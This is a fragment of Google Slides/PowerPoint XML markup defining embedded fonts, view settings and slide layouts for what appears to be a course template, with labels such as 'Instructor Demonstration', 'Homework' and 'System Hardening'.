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0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9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Roboto Black" panose="020B0604020202020204" charset="0"/>
      <p:bold r:id="rId25"/>
      <p:boldItalic r:id="rId26"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId27"/>
      <p:bold r:id="rId28"/>
      <p:italic r:id="rId29"/>
      <p:boldItalic r:id="rId30"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId31"/>
      <p:bold r:id="rId32"/>
      <p:italic r:id="rId33"/>
      <p:boldItalic r:id="rId34"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId35"/>
      <p:bold r:id="rId36"/>
      <p:italic r:id="rId37"/>
      <p:boldItalic r:id="rId38"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="020B0604020202020204" charset="0"/>
      <p:regular r:id="rId39"/>
      <p:bold r:id="rId40"/>
      <p:italic r:id="rId41"/>
      <p:boldItalic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      <p15:guide id="1" orient="horz">
          <p15:clr>
            <a:srgbClr val="9AA0A6"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" orient="horz" pos="2232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8B656EAD-8703-4AB1-84B0-60A72AC46955}">
  <a:tblStyle styleId="{8B656EAD-8703-4AB1-84B0-60A72AC4695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>
    <p:restoredLeft sz="34587" autoAdjust="0"/>
    <p:restoredTop sz="94622" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="147" d="100"/>
          <a:sy n="147" d="100"/>
        </p:scale>
        <p:origin x="-594" y="-102"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz"/>
        <p:guide orient="horz" pos="223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font" Target="fonts/font15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42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1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font" Target="fonts/font14.fntdata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41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/font" Target="fonts/font1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font" Target="fonts/font16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43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50824712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g8798eb4c4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6" name="Google Shape;1016;g8798eb4c4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Google Shape;1128;g8623a2bef4_1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9" name="Google Shape;1129;g8623a2bef4_1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" name="Google Shape;1149;g8798eb4c44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0" name="Google Shape;1150;g8798eb4c44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6" name="Google Shape;1156;g8623a2bef4_1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7" name="Google Shape;1157;g8623a2bef4_1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6" name="Google Shape;1166;g8623a2bef4_1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7" name="Google Shape;1167;g8623a2bef4_1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6" name="Google Shape;1176;g8623a2bef4_1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7" name="Google Shape;1177;g8623a2bef4_1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g8623a2bef4_1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7" name="Google Shape;1187;g8623a2bef4_1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g8798eb4c44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7" name="Google Shape;1197;g8798eb4c44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3" name="Google Shape;1203;g8798eb4c44_0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4" name="Google Shape;1204;g8798eb4c44_0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Google Shape;1211;g8798eb4c44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2" name="Google Shape;1212;g8798eb4c44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" name="Google Shape;1219;g8798eb4c44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0" name="Google Shape;1220;g8798eb4c44_0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g8623a2bef4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2" name="Google Shape;1022;g8623a2bef4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7" name="Google Shape;1227;g8798eb4c44_0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8" name="Google Shape;1228;g8798eb4c44_0_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g8798eb4c44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6" name="Google Shape;1236;g8798eb4c44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3" name="Google Shape;1243;g8798eb4c44_0_2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4" name="Google Shape;1244;g8798eb4c44_0_2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g80f7e6291e_1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9" name="Google Shape;1049;g80f7e6291e_1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g8798eb4c44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5" name="Google Shape;1055;g8798eb4c44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g8798eb4c44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3" name="Google Shape;1063;g8798eb4c44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g8798eb4c44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1" name="Google Shape;1071;g8798eb4c44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g8798eb4c44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9" name="Google Shape;1079;g8798eb4c44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" name="Google Shape;1086;g8623a2bef4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7" name="Google Shape;1087;g8623a2bef4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g8623a2bef4_1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8" name="Google Shape;1108;g8623a2bef4_1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png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pn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. Title Slide: Web Development">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_2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8;p2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9" name="Google Shape;9;p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" name="Google Shape;10;p2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 dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Google Shape;11;p2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1800" dirty="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3" name="Google Shape;13;p2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16" name="Google Shape;16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. Instructor Demonstration">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_2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1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1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5" name="Google Shape;85;p11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6" name="Google Shape;86;p1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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="87" name="Google Shape;87;p11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40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 dirty="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88" name="Google Shape;88;p11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9" name="Google Shape;89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1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91440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. Activity">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1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2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94" name="Google Shape;94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2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2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97" name="Google Shape;97;p12"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="3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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99" name="Google Shape;99;p12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" name="Google Shape;100;p12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2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. Activity with Instructions ">
  <p:cSld name="CUSTOM_2_5_1_3_1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3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect t="29" b="3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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="105" name="Google Shape;105;p1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6" name="Google Shape;106;p1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3"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="109" name="Google Shape;109;p1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0" name="Google Shape;110;p13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13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. Challenge">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_4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4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15" name="Google Shape;11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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Google Shape;117;p14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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14"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2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14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" name="Google Shape;120;p1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21" name="Google Shape;121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. Challenge with Instructions">
  <p:cSld name="CUSTOM_2_5_1_4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5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr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1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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="125" name="Google Shape;125;p1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6" name="Google Shape;126;p15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27" name="Google Shape;127;p15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title" idx="2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15"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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29" name="Google Shape;129;p1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0" name="Google Shape;130;p15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31" name="Google Shape;131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. Homework">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_3_1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16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6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35" name="Google Shape;135;p16"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="209" r="209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37" name="Google Shape;13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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="139" name="Google Shape;139;p16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16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sz="1300" b="1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" name="Google Shape;141;p1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16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      <p15:guide id="1" pos="1800">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Homework with Instructions">
  <p:cSld name="CUSTOM_2_5_2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7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45" name="Google Shape;145;p1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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="146" name="Google Shape;146;p1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47" name="Google Shape;147;p17"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect l="504" r="504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17"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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0" name="Google Shape;150;p1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1" name="Google Shape;151;p17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17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      <p15:guide id="1" pos="5005">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–4 (Green)">
  <p:cSld name="CUSTOM_2_7_1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5" name="Google Shape;155;p1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1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7" name="Google Shape;157;p1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8" name="Google Shape;158;p1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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="159" name="Google Shape;159;p1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0" name="Google Shape;160;p1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61" name="Google Shape;161;p18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62" name="Google Shape;162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 dirty="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3" name="Google Shape;163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64" name="Google Shape;164;p18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65" name="Google Shape;165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 dirty="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6" name="Google Shape;166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67" name="Google Shape;167;p18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68" name="Google Shape;168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 dirty="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9" name="Google Shape;169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70" name="Google Shape;170;p18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71" name="Google Shape;171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 dirty="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72" name="Google Shape;172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73" name="Google Shape;173;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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1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5" name="Google Shape;175;p1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6" name="Google Shape;176;p1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7" name="Google Shape;177;p18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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18"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–5 (Green)">
  <p:cSld name="CUSTOM_2_7_1_4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9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2" name="Google Shape;182;p1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1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84" name="Google Shape;184;p1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5" name="Google Shape;185;p1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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="186" name="Google Shape;186;p1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7" name="Google Shape;187;p1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88" name="Google Shape;188;p19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189" name="Google Shape;189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 dirty="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0" name="Google Shape;190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91" name="Google Shape;191;p19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192" name="Google Shape;192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 dirty="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3" name="Google Shape;193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94" name="Google Shape;194;p19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195" name="Google Shape;195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 dirty="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6" name="Google Shape;196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97" name="Google Shape;197;p19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198" name="Google Shape;19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 dirty="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9" name="Google Shape;19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200" name="Google Shape;200;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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19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2" name="Google Shape;202;p19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3" name="Google Shape;203;p19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4" name="Google Shape;204;p19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19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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6" name="Google Shape;206;p19"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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07" name="Google Shape;207;p19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08" name="Google Shape;20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 dirty="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9" name="Google Shape;20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210" name="Google Shape;210;p19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1" name="Google Shape;211;p19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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–6 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1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0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4" name="Google Shape;214;p2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5" name="Google Shape;215;p2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16" name="Google Shape;216;p2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7" name="Google Shape;217;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="218" name="Google Shape;218;p2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9" name="Google Shape;219;p2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20" name="Google Shape;220;p20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21" name="Google Shape;221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 dirty="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2" name="Google Shape;222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223" name="Google Shape;223;p20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24" name="Google Shape;224;p20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225" name="Google Shape;225;p20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26" name="Google Shape;226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 dirty="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7" name="Google Shape;227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228" name="Google Shape;228;p20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229" name="Google Shape;229;p20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30" name="Google Shape;230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 dirty="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1" name="Google Shape;231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232" name="Google Shape;232;p20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233" name="Google Shape;233;p20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34" name="Google Shape;234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 dirty="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5" name="Google Shape;235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236" name="Google Shape;236;p20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237" name="Google Shape;237;p20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38" name="Google Shape;238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 dirty="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9" name="Google Shape;239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240" name="Google Shape;240;p20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241" name="Google Shape;241;p20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42" name="Google Shape;242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 dirty="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3" name="Google Shape;243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244" name="Google Shape;244;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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5" name="Google Shape;245;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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6" name="Google Shape;246;p20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7" name="Google Shape;247;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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8" name="Google Shape;248;p20"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Title Slide: UX/UI Design">
  <p:cSld name="CUSTOM_2_3_1_1_1_1_1_2_1_2_1_1_1_1_2_2_1_1_1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3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9" name="Google Shape;19;p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" name="Google Shape;20;p3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 dirty="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1" name="Google Shape;21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25" name="Google Shape;25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3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. Numbered 1–6 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_2"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1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51" name="Google Shape;251;p2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2" name="Google Shape;252;p2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53" name="Google Shape;253;p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4" name="Google Shape;254;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p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6" name="Google Shape;256;p2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57" name="Google Shape;257;p21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58" name="Google Shape;258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 dirty="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9" name="Google Shape;259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260" name="Google Shape;260;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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1" name="Google Shape;261;p21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262" name="Google Shape;262;p21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63" name="Google Shape;263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 dirty="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4" name="Google Shape;264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265" name="Google Shape;265;p21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266" name="Google Shape;266;p21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67" name="Google Shape;267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 dirty="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8" name="Google Shape;268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269" name="Google Shape;269;p21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270" name="Google Shape;270;p21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71" name="Google Shape;271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 dirty="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2" name="Google Shape;272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273" name="Google Shape;273;p21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274" name="Google Shape;274;p21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75" name="Google Shape;275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 dirty="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6" name="Google Shape;276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277" name="Google Shape;277;p21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278" name="Google Shape;278;p21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79" name="Google Shape;279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 dirty="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0" name="Google Shape;280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281" name="Google Shape;281;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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2" name="Google Shape;282;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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3" name="Google Shape;283;p21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4" name="Google Shape;284;p21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5" name="Google Shape;285;p21"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–7 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1"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2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88" name="Google Shape;288;p2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9" name="Google Shape;289;p2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90" name="Google Shape;290;p2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1" name="Google Shape;291;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="292" name="Google Shape;292;p2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3" name="Google Shape;293;p2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94" name="Google Shape;294;p22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295" name="Google Shape;29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 dirty="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96" name="Google Shape;29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297" name="Google Shape;297;p22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8" name="Google Shape;298;p22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299" name="Google Shape;299;p22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00" name="Google Shape;30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 dirty="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1" name="Google Shape;30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302" name="Google Shape;302;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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3" name="Google Shape;303;p22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304" name="Google Shape;304;p22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05" name="Google Shape;30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 dirty="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6" name="Google Shape;30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307" name="Google Shape;307;p22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8" name="Google Shape;308;p22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309" name="Google Shape;309;p22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10" name="Google Shape;31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 dirty="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1" name="Google Shape;31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312" name="Google Shape;312;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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3" name="Google Shape;313;p22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314" name="Google Shape;314;p22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15" name="Google Shape;31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 dirty="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6" name="Google Shape;31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317" name="Google Shape;317;p22"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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8" name="Google Shape;318;p22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319" name="Google Shape;319;p22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20" name="Google Shape;32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 dirty="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1" name="Google Shape;32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322" name="Google Shape;322;p22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23" name="Google Shape;323;p22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324" name="Google Shape;324;p22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25" name="Google Shape;32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 dirty="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6" name="Google Shape;32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327" name="Google Shape;327;p22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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–8 (Gray)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1"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0" name="Google Shape;330;p2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31" name="Google Shape;331;p2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2" name="Google Shape;332;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="333" name="Google Shape;333;p2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4" name="Google Shape;334;p2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5" name="Google Shape;335;p23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336" name="Google Shape;336;p23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37" name="Google Shape;33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 dirty="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8" name="Google Shape;33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339" name="Google Shape;339;p23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0" name="Google Shape;340;p23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341" name="Google Shape;341;p23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42" name="Google Shape;34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 dirty="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3" name="Google Shape;34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344" name="Google Shape;344;p23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5" name="Google Shape;345;p23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346" name="Google Shape;346;p23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47" name="Google Shape;34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 dirty="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8" name="Google Shape;34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349" name="Google Shape;349;p23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0" name="Google Shape;350;p23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351" name="Google Shape;351;p23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52" name="Google Shape;35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 dirty="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3" name="Google Shape;35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354" name="Google Shape;354;p23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5" name="Google Shape;355;p23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356" name="Google Shape;356;p23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357" name="Google Shape;35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 dirty="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8" name="Google Shape;35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359" name="Google Shape;359;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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0" name="Google Shape;360;p23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361" name="Google Shape;361;p23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362" name="Google Shape;36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 dirty="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3" name="Google Shape;36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364" name="Google Shape;364;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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5" name="Google Shape;365;p23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366" name="Google Shape;366;p23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367" name="Google Shape;36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 dirty="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8" name="Google Shape;36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369" name="Google Shape;369;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="9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0" name="Google Shape;370;p23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371" name="Google Shape;371;p23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372" name="Google Shape;37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 dirty="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3" name="Google Shape;37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374" name="Google Shape;374;p23"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="13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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–8 (Green)">
  <p:cSld name="CUSTOM_2_7_1_3_1_1_1_1_1"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7" name="Google Shape;377;p2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78" name="Google Shape;378;p2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9" name="Google Shape;379;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="380" name="Google Shape;380;p2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1" name="Google Shape;381;p2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2" name="Google Shape;382;p24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383" name="Google Shape;383;p24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84" name="Google Shape;38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 dirty="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5" name="Google Shape;38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386" name="Google Shape;386;p24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7" name="Google Shape;387;p24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388" name="Google Shape;388;p24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89" name="Google Shape;38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 dirty="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0" name="Google Shape;39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391" name="Google Shape;391;p24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2" name="Google Shape;392;p24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393" name="Google Shape;393;p24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94" name="Google Shape;39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 dirty="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5" name="Google Shape;39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396" name="Google Shape;396;p24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7" name="Google Shape;397;p24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398" name="Google Shape;398;p24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99" name="Google Shape;39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 dirty="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0" name="Google Shape;40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401" name="Google Shape;401;p24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2" name="Google Shape;402;p24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403" name="Google Shape;403;p24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04" name="Google Shape;40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 dirty="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5" name="Google Shape;40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406" name="Google Shape;406;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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7" name="Google Shape;407;p24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408" name="Google Shape;408;p24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09" name="Google Shape;40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 dirty="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0" name="Google Shape;41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411" name="Google Shape;411;p24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="8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2" name="Google Shape;412;p24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413" name="Google Shape;413;p24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14" name="Google Shape;41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 dirty="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5" name="Google Shape;41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416" name="Google Shape;416;p24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7" name="Google Shape;417;p24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418" name="Google Shape;418;p24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19" name="Google Shape;41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 dirty="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0" name="Google Shape;42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421" name="Google Shape;421;p24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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–3 (Green)">
  <p:cSld name="CUSTOM_2_7_1_5"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2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24" name="Google Shape;424;p2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25" name="Google Shape;425;p2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6" name="Google Shape;426;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="427" name="Google Shape;427;p2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8" name="Google Shape;428;p2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29" name="Google Shape;429;p25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30" name="Google Shape;43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 dirty="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1" name="Google Shape;43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432" name="Google Shape;432;p25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33" name="Google Shape;433;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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34" name="Google Shape;434;p25"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3305156" y="1345103"/>
            <a:ext cx="533372" cy="533480"/>
            <a:chOff x="457200" y="1378813"/>
            <a:chExt cx="695400" cy="695450"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="435" name="Google Shape;435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 dirty="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6" name="Google Shape;436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437" name="Google Shape;437;p25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3572250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38" name="Google Shape;438;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35722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39" name="Google Shape;439;p25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440" name="Google Shape;44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 dirty="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1" name="Google Shape;44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442" name="Google Shape;442;p25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43" name="Google Shape;443;p25"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–2 (Blue)">
  <p:cSld name="CUSTOM_2_7_1_5_2_1"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Google Shape;445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75" y="649650"/>
            <a:ext cx="827450" cy="4115237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2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47" name="Google Shape;447;p2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48" name="Google Shape;448;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="449" name="Google Shape;449;p2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0" name="Google Shape;450;p2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1" name="Google Shape;451;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="2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2" name="Google Shape;452;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4936274" y="890150"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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System Hardening</a:t>
            </a:r>
            <a:endParaRPr sz="2100" dirty="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53" name="Google Shape;453;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="5072469" y="1278938"/>
            <a:ext cx="261029" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtract">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="365C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54" name="Google Shape;454;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457246" y="887925"/>
            <a:ext cx="2688300" cy="476700"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 16667"/>
            </a:avLst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Alarm</a:t>
            </a:r>
            <a:endParaRPr sz="2100" dirty="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55" name="Google Shape;455;p26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="575363" y="1276701"/>
            <a:ext cx="226486" cy="144694"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartExtra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56" name="Google Shape;456;p26"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C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. Numbered 1–5 (Grey)">
  <p:cSld name="CUSTOM_2_7_1_5_1"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2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9" name="Google Shape;459;p2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60" name="Google Shape;460;p2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1" name="Google Shape;461;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="462" name="Google Shape;462;p2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3" name="Google Shape;463;p2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64" name="Google Shape;464;p27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 dirty="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65" name="Google Shape;465;p27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66" name="Google Shape;466;p27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67" name="Google Shape;467;p27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68" name="Google Shape;468;p27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69" name="Google Shape;469;p27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 dirty="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0" name="Google Shape;470;p27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 dirty="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1" name="Google Shape;471;p27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72" name="Google Shape;472;p27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73" name="Google Shape;473;p27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74" name="Google Shape;474;p27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75" name="Google Shape;475;p27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 dirty="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6" name="Google Shape;476;p27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 dirty="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7" name="Google Shape;477;p27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78" name="Google Shape;478;p27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79" name="Google Shape;479;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="3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0" name="Google Shape;480;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="4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1" name="Google Shape;481;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="5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2" name="Google Shape;482;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="6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3" name="Google Shape;483;p27"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="7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. Bullets 1–4 (Greens)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2"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2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86" name="Google Shape;486;p2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7" name="Google Shape;487;p2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88" name="Google Shape;488;p2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9" name="Google Shape;489;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="490" name="Google Shape;490;p2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1" name="Google Shape;491;p2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2" name="Google Shape;492;p28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3" name="Google Shape;493;p2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94" name="Google Shape;494;p2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95" name="Google Shape;495;p2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96" name="Google Shape;496;p28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7" name="Google Shape;497;p28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8" name="Google Shape;498;p28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499" name="Google Shape;499;p2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p2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p2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p2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      <p15:guide id="1" pos="288">
          <p15:clr>
            <a:srgbClr val="F9AD4C"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="2" pos="1512">
          <p15:clr>
            <a:srgbClr val="FA7B17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. Bullets 1–4 (Yellow/Green)">
  <p:cSld name="CUSTOM_2_7_1_6_1_2_1"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29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05" name="Google Shape;505;p2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6" name="Google Shape;506;p2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07" name="Google Shape;507;p2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08" name="Google Shape;508;p2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  <p:cxnSp>
        <p:nvCxnSpPr>
